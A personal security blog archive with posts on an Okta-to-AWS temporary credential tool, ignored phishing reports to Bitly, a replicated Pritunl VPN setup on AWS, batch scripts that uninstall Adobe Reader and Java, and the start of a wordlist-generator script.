Project release: AWS Okta Keyman

Available today; AWS Okta Keyman. This package is a fork of previous work by Nextdoor, Inc. that adds Duo Auth support and has other features already on the roadmap.

This package allows the user, who uses Okta with AWS today, to authenticate with Okta, use that to authenticate to AWS, and then pulls down temporary credentials (access key and secret key) for interacting with the AWS APIs. This allows for users to have access to AWS APIs without long-lived API keys stored on their dev systems. This helps protect the AWS resources as the keys are only valid for at most an hour so an unintended disclosure or leak has a very short window of risk before the keys become invalid. It also helps by enforcing the idea of continually rotating keys; not so different from what the on-box EC2 experience is like when using IAM Roles for EC2.

If you are using Okta to log in to AWS give it a try today; pip install aws-okta-keyman

The source is available under the Apache 2.0 license.

For more information: https://github.com/nathan-v/aws_okta_keyman

It’s time to say goodbye to Bit.ly

Don’t get this backwards; they’re still very much alive… but they are dead to me. Today marked the second time in the last few months I’ve emailed them to notify them that their service was being utilized to facilitate a phishing campaign. Both times now they have simply ignored me.

No response.

Nothing.

I notified them on April 5th of one of these links. They never replied. That link still exists today though my emails to the hosting provider and the site owner seemed to have landed on someone’s listening ears as their compromised Drupal install was fixed and updated soon after. The phishing link just takes you to the previously-compromised site’s homepage now but it should have been taken down by Bitly.

Today? Well I got a nice auto-emailer this time at least saying thanks for the email but the link continues to get clicked on by unsuspecting users. At the time of writing more than 2,200 clicks have been registered.

They have nothing listed on their knowledge base about phishing though spam is mentioned. Their support auto-emailer lets you happily know it may take two business days for them to get back to you. More than enough time for a phisher to gather tens of thousands of people’s information.

I’ve once again emailed the hosting provider and the domain registrar. No responses from anyone yet but I happen to use the same registrar for a couple of my domains so I’m hoping to get… something… back.

The phishing site is of lower quality this time, at least. Hopefully some people notice the ‘Finish’ button is instead labeled ‘Finnish’ but if they actually clicked on some random Bitly link sent to them via SMS… chances are low.

Phishing site

Hopefully the hosting provider takes notice.

To my original point; it’s time to let Bitly die on the vine if they can’t even acknowledge their part in the theft of user’s personal information and do something to thwart the thieves taking advantage of their service. They have been given the opportunity to stop a phisher in their tracks and they chose to look the other way.

Just stop trusting Bitly links. If the RickRolls weren’t enough to convince you; this should be.

Bitfail logo

Update 23 June 2016: The only company involved that has responded was the registrar who did so not long after the hosted site stopped responding. Better than silence.

Pritunl for AWS VPC with Replicated Servers

After doing some research on VPN alternatives to using AWS’ provided VPN options I recently settled on doing a test with the software Pritunl. The software is an open-source GUI frontend for OpenVPN. It does a nice job of simplifying the management and configuration of the VPN endpoints and, when you pay for Pritunl Enterprise, also includes some other nifty features.

There are several features that are unlocked by paying for the Enterprise license and one of those is Replicated Servers. Replicated Servers gives you a unified backend database (using MongoDB) that stores configuration and user information. This lets you run multiple Pritunl hosts for your users to provide extra endpoints in the event of a failure.

The setup is pretty simple but since I didn’t see any articles or posts covering the setup so I thought it would be good to go ahead and put something together. In this case I’ll be using AWS but the principals are the same no matter where the hosts are.

For this example we’ll be using Ubuntu Server to keep things more provider-agnostic. It’s possible to use Arch Linux or Amazon Linux instead if you prefer that.

First, of course, you’ll need to be logged into the AWS console or have the CLI set up on your machine.

Go ahead and allocate 3 Elastic IPs in your VPC. We’ll use two for the internet-facing hosts and the last will be a way to provide a static IP for the database host. You can use other methods to make the IP stick but this one is the simplest and it allows the host to update from the web.

Set up two EC2 security groups:

  • VPN:
    • TCP/22 open to your IP for SSH
    • TCP/9700 open to your IP for access to the web UI (you may want to open this to /0 later)
    • UDP 25000 open to 0.0.0.0/0 for the VPN tunnel
  • VPN DB:
    • TCP/22 open to your IP for SSH (you may want to remove this or limit it later on)
    • TCP 27017 open to the VPN SG for the database connection

We’ll start with the database host first. Go ahead and start an instance of the size that suits your deployment and use Ubuntu Server 14.04. You’ll probably want to put this in your private subnet if you have one. Make sure you have set the security group up as above. Assign one of the EIPs to the host and go ahead and connect over SSH.

Once logged in you’ll want to execute the following commands:

# Update the host
sudo apt-get update
sudo apt-get -y upgrade

# Add the MongoDB repo key to apt
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 7F0CEB10

# Add MongoDB repo to apt sources
echo "deb http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.0 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-3.0.list

# Update apt and install MongoDB
sudo apt-get update
sudo apt-get install -y mongodb-org

# Tell MongoDB to listen for external connections
sudo nano /etc/mongod.conf
# Comment out the line "bind_ip = 127.0.0.1"
# Start MongoDB
sudo service mongod start

Woohoo! Our database lives!

Next let’s start the Pritunl VPN hosts. You can start as many or as few as you need and with the size that suits best but again use Ubuntu Server 14.04. These should be in your public subnet. Assign EIPs for each. Then go ahead and connect over SSH.

For each machine do the following:

# Update the host
sudo apt-get update
sudo apt-get -y upgrade

# Add the Pritunl apt key
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com --recv CF8E292A

# Add the Pritunl repo to apt
echo "deb http://repo.pritunl.com/stable/apt trusty main" | sudo tee /etc/apt/sources.list.d/pritunl.list

# Update apt and install Pritunl
sudo apt-get update
sudo apt-get -y install pritunl

# Start Pritunl
sudo service pritunl start

You’ll then need to open your browser to https://<host IP>:9700/ and fill in the MongoDB host information. On the first host you’ll then log in with the default user/password of pritunl/pritunl, change the login, and then enter your Enterprise license key. After that log in to each of the rest of the hosts and enter the MongoDB host information.

Now with that finished we have replicated Pritunl configured. Not including bandwidth or the discounts of reserved instances it can be about $90/month for this setup using two t2.micro instances for the VPC endpoints and a t2.small for the MongoDB host. So far in testing I’ve successfully pushed greater than 25mbps through a connection on the t2.micro host without any fuss.

The next step involves a little planning. Consider what parts of the network different user groups will need to access. If everyone will have access to everything in your VPC this is easy but otherwise you’ll need to plan for which subnets people need access to. This could mean splitting things up by teams or maybe just production access accounts versus nonproduction access.

Go to the Users tab. You’ll want to create one or more Organizations for users to be grouped into. For each different group that needs access to different subnets you’ll want different organizations. After that go ahead and put the users in their correct organizations. With Pritunl Enterprise you can use SSO to handle part of this but that’s something to cover another time.

At this point you can set up your first Pritunl sever. In the web interface one one of the hosts go to the Servers tab. There click on the Add Server button and fill out the form. For the UDP port enter 25000 (that we added to the EC2 SG earlier). Make sure to click on the Advanced button and enter the number of replicated hosts you’ll use for the connections. You’ll also want to change the server mode to Local Traffic Only and specify what subnets the VPN server should give access to. Once satisfied with the config click Add and then watch the UI. The server will generate it’s DH parameters in the background. If you’ve selected parameters more complex than the default 1536 it’s going to take a little bit to finish. I’d recommend you use at least 2048.

You can start making additional servers for each set of subnets people might need to access. Associate the organizations to each based on their needs.

Once that’s all done and all of the DH parameters have been generated you can start the servers. After they’ve started you can download the credentials for your user and confirm that the VPN responds as it should.

You should now be all set; distribute the credentials needed to all of your users and enjoy.

Update:
Below is the script I run on the Mongo box to back it up each night and drop the results into S3.

#!/bin/sh

TODAY=`date +%Y-%m-%d`
echo "Backing up MongoDB database for $TODAY..."
mongodump --out /backup/pritunldb-$TODAY
echo "Backup complete. Compressing output..."
cd /backup/
tar -zcf pritunldb-$TODAY.tar.gz pritunldb-$TODAY/
echo "Compression complete. Copying to S3..."
/usr/local/bin/aws s3 cp pritunldb-`echo $TODAY`.tar.gz s3:///pritunl/db/
echo "S3 copy complete. Cleaning up..."
rm -rf pritunldb-$TODAY/
find /backup/* -mtime +21 -exec rm {} \;
echo "Cleanup complete. Backup complete."

Batch Script: Purge Reader

Going along with the batch theme this one is designed to take Reader / Acrobat off of the target system.  If I missed any GUIDs or you have any suggestions please feel free to email or comment here

Thanks!
-Nathan V

@echo off
GOTO START
#################################################
# Purge Reader Script by:                       #
#      Nathan V                                 #
#      Cyber Security Analyst                   #
#      http://nathanv.com                       #
#                                               #
# For assistance and new versions contact       #
#      nathan.v@gmail.com                       #
#                                               #
# This file updated:                30 SEP 2012 #
#                                               #
# Purge Java (c) 2012 Nathan V  License: GPLv3  #
# This is free software, and you are welcome to #
# redistribute it under certain conditions; See #
# http://www.gnu.org/licenses/gpl.html          #
#################################################

:START
msiexec /x {AC76BA86-7AD7-1033-7B44-000000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A00000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-0000-0000-0000-6028747ADE01} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-0000-7EC8-7489-000000000603} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-0000-7EC8-7489-000000000604} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-0000-7EC8-7489-000000000605} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-0000-7EC8-7489-000000000606} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A70500000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A70700000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A70800000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A70900000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A71000000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-5464-3428-800000000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-5464-3428-800000000004} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A80000000002} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A81000000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A81100000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A81200000003} /qn /log c:\temp\purgereader.log
msiexec /x {6846389C-BAC0-4374-808E-B120F86AF5D7} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A81300000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A82000000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A83000000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-5464-3428-900000000004} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A81000000003} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A92000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A93000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-A94000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-5464-3428-A00000000004} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-AA0000000001} /qn /log c:\temp\purgereader.log
msiexec /x {AC76BA86-7AD7-1033-7B44-AA1000000001} /qn /log c:\temp\purgereader.log

More Information:

Batch Script: Purge Java

Due to the recent disclosures and most especially yesterday’s announcement of Java vulnerabilities I thought I should release my Java Purge Script.  You can read more information about the most recent events in the links at the bottom in the More Information section.

This script is part of a suite I’ll be releasing soon that I use for pushing patches and batches to remote computers that allows you to stage the files in advance (first runtime) and then execute them during your patch window using psexec (second runtime) to give you better control on when and how the patches are executed.  No ETA on that one yet as it’s a living file still.

For this script you can run it locally or push it with a policy to run on target systems.  It should remove all versions of JRE and JDK from the target system.

As always;  If you have any suggestions for improvements please let me know.

@echo off
GOTO START
#################################################
# Purge Java Script by:                         #
#      Nathan V                                 #
#      Cyber Security Analyst                   #
#      http://nathanv.com                       #
#                                               #
# For assistance and new versions contact       #
#      nathan.v@gmail.com                       #
#                                               #
# This file updated:                26 SEP 2012 #
#                                               #
# Purge Java (c) 2012 Nathan V  License: GPLv3  #
# This is free software, and you are welcome to #
# redistribute it under certain conditions; See #
# http://www.gnu.org/licenses/gpl.html          #
#################################################

:START
net stop JavaQuickStarterService
taskkill /f /im jqs.exe /im jucheck.exe /im javaw.exe

msiexec /x {1111706F-666A-4037-7777-202328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {1111706F-666A-4037-7777-203328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {1111706F-666A-4037-7777-210328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {1111706F-666A-4037-7777-211328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {1666FA7C-CB5F-11D6-A78C-00B0D079AF64} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {2222706F-666A-4037-7777-202328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {2222706F-666A-4037-7777-203328764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83214204FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215002FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215004FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215005FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215006FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215007FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215010FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215011FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83215012FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216000FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216010FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216011FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216012FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216013FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216014FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216015FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216016F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216016FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216017F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216017FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216018FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216019F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216019FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216020F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216020FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216022F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216022FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216023F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216023FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216024F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216024FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216025F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216025FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216026F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216026FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216027F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216027FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216028F0} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216028FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216029FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216030FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216031FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216032FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216033FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216034FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216035FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83216050FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217000FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217001FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217002FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217003FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217004FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217005FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217006FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {26A24AE4-039D-4CA4-87B4-2F83217007FF} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150000} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150010} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150020} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150030} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150040} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150050} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150060} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150070} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150080} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150090} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150100} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150110} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150120} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150130} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150140} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150210} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0150220} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160000} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160010} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160020} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160030} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160031} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160040} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160050} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160060} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160070} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160080} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {3248F0A8-6813-11D6-A77B-00B0D0160090} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0150060} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160200} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160210} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160220} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160230} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160240} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160250} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160260} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160270} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160280} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160290} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160310} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160320} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0160330} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170000} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170010} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170020} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170030} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170040} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {32A3A4F4-B792-11D6-A78A-00B0D0170050} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {4A03706F-666A-4037-7777-5F2748764D10} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142000} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142010} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142020} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142030} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142040} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142050} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142060} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142070} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142080} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142090} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142100} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142110} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142120} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142130} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142140} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142150} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress
msiexec /x {7148F0A8-6813-11D6-A77B-00B0D0142160} /qn /norestart /log c:\temp\purgejava.log REBOOT=Suppress

More Information:

Shell Script: Use Twitter and Bing to Generate Wordlists

There are some great wordlists out there for sure… but a targeted wordlist that fits with the subject of the target site/database can prove to be much more effective.  Joshua Dustin posted to his blog recently about this and I thought this was an excellent idea and wanted to take it a little bit further.  This script adds some automation to his idea and also adds a word-grab from Bing as well.  Since it’s a little more modularized in this script it’ll be easy to add other word sources.  I’ll be adding more soon once I have additional time to do so.  Please check out his post for further information on why this type of wordlist generation can be so effective.  He does a great job explaining it.

I have a few other things in the works I had intended on releasing sooner (rather than another post based on someone else’ idea) but those scripts are getting near-daily updates due to the fact that I’m using them constantly.  One just got a roughly 20x speed boost today thanks to some command-line option changes.  Don’t worry, though, they’re worth the wait!  Now, on to the code;

Running this script:

  • Run it using as many keywords as you’d like to scrape off the web:
    • ./wordlistgen.sh your keywords go here
#!/bin/bash
#################################################
# Internet Wordlist Generator by:               #
#      Nathan V                                 #
#      Cyber Security Analyst                   #
#      http://nathanv.com                       #
#                                               #
# For assistance and new versions contact       #
#      nathan.v@gmail.com                       #
# This file updated:               18 July 2012 #
#################################################
# This script (c)2012 Nathan V : License: GPLv3 #
# This is free software, and you are welcome to #
# redistribute it under certain conditions; See #
# http://www.gnu.org/licenses/gpl.html          #
#################################################
